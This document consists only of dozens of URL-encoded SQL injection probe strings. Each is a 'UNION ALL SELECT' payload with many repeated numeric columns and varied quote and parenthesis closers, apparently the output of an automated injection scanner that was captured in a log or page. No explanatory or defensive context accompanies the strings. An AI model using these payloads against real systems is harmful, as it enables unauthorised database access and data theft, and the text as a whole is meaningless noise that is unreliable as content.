-4336%22%20UNION%20ALL%20SELECT%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971--%20 -7877%22%20UNION%20ALL%20SELECT%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880--%20 -9472%22%20UNION%20ALL%20SELECT%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222--%20 -4119%22%20UNION%20ALL%20SELECT%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122--%20 -4417%22%20UNION%20ALL%20SELECT%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221%2C%202221--%20 -2159%22%20UNION%20ALL%20SELECT%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965%2C%202965--%20 -5544%29%20UNION%20ALL%20SELECT%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975%2C%208975--%20%20AND%20%287522%3D7522 -1453%29%20UNION%20ALL%20SELECT%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267%2C%209267--%20%20AND%20%289407%3D9407 -7337%29%20UNION%20ALL%20SELECT%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825--%20%20AND%20%283078%3D3078 -7430%29%20UNION%20ALL%20SELECT%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027--%20%20AND%20%284430%3D4430 -3719%29%20UNION%20ALL%20SELECT%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332%2C%207332--%20%20AND%20%286368%3D6368 -6530%29%20UNION%20ALL%20SELECT%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560--%20%20AND%20%282794%3D2794 -7395%29%20UNION%20ALL%20SELECT%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887%2C%204887--%20%20AND%20%285273%3D5273 -6678%29%20UNION%20ALL%20SELECT%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126--%20%20AND%20%288594%3D8594 -9061%29%20UNION%20ALL%20SELECT%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695%2C%201695--%20%20AND%20%289638%3D9638 -6749%29%20UNION%20ALL%20SELECT%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598%2C%201598--%20%20AND%20%282032%3D2032 -1047%29%29%20UNION%20ALL%20SELECT%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402%2C%202402--%20%20AND%20%28%288427%3D8427 -8091%29%29%20UNION%20ALL%20SELECT%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661--%20%20AND%20%28%287532%3D7532 -3665%29%29%20UNION%20ALL%20SELECT%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606--%20%20AND%20%28%285924%3D5924 -2736%29%29%20UNION%20ALL%20SELECT%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545--%20%20AND%20%28%283750%3D3750 -2111%29%29%20UNION%20ALL%20SELECT%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053--%20%20AND%20%28%285785%3D5785 -3082%29%29%20UNION%20ALL%20SELECT%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249%2C%207249--%20%20AND%20%28%286523%3D6523 -7084%29%29%20UNION%20ALL%20SELECT%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593%2C%204593--%20%20AND%20%28%283968%3D3968 -1443%29%29%20UNION%20ALL%20SELECT%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360%2C%204360--%20%20AND%20%28%281683%3D1683 -8981%29%29%20UNION%20ALL%20SELECT%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195--%20%20AND%20%28%282293%3D2293 -5440%29%29%20UNION%20ALL%20SELECT%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194%2C%201194--%20%20AND%20%28%287139%3D7139 -8063%29%29%29%20UNION%20ALL%20SELECT%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816--%20%20AND%20%28%28%281115%3D1115 -5052%29%29%29%20UNION%20ALL%20SELECT%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557--%20%20AND%20%28%28%285983%3D5983 -2805%29%29%29%20UNION%20ALL%20SELECT%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389--%20%20AND%20%28%28%283603%3D3603 -7714%29%29%29%20UNION%20ALL%20SELECT%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236--%20%20AND%20%28%28%282628%3D2628 -1136%29%29%29%20UNION%20ALL%20SELECT%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681--%20%20AND%20%28%28%282948%3D2948 -5766%29%29%29%20UNION%20ALL%20SELECT%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542--%20%20AND%20%28%28%281552%3D1552 -1998%29%29%29%20UNION%20ALL%20SELECT%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346--%20%20AND%20%28%28%283200%3D3200 -9419%29%29%29%20UNION%20ALL%20SELECT%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295%2C%204295--%20%20AND%20%28%28%289146%3D9146 -9493%29%29%29%20UNION%20ALL%20SELECT%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087%2C%206087--%20%20AND%20%28%28%282774%3D2774 -1210%29%29%29%20UNION%20ALL%20SELECT%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629%2C%206629--%20%20AND%20%28%28%282705%3D2705 -5313%20UNION%20ALL%20SELECT%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215%2C%205215--%20 -2798%20UNION%20ALL%20SELECT%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272--%20 -3132%20UNION%20ALL%20SELECT%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303--%20 -8576%20UNION%20ALL%20SELECT%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437--%20 -2714%20UNION%20ALL%20SELECT%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776--%20 -7436%20UNION%20ALL%20SELECT%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937--%20 -1065%20UNION%20ALL%20SELECT%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285--%20 -7966%20UNION%20ALL%20SELECT%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617--%20 -1286%20UNION%20ALL%20SELECT%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274%2C%202274--%20 -9782%20UNION%20ALL%20SELECT%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016--%20 -5570%27%29%20UNION%20ALL%20SELECT%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065--%20%20AND%20%28%27JFpW%27%3D%27JFpW -4189%27%29%20UNION%20ALL%20SELECT%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339--%20%20AND%20%28%27cRRc%27%3D%27cRRc 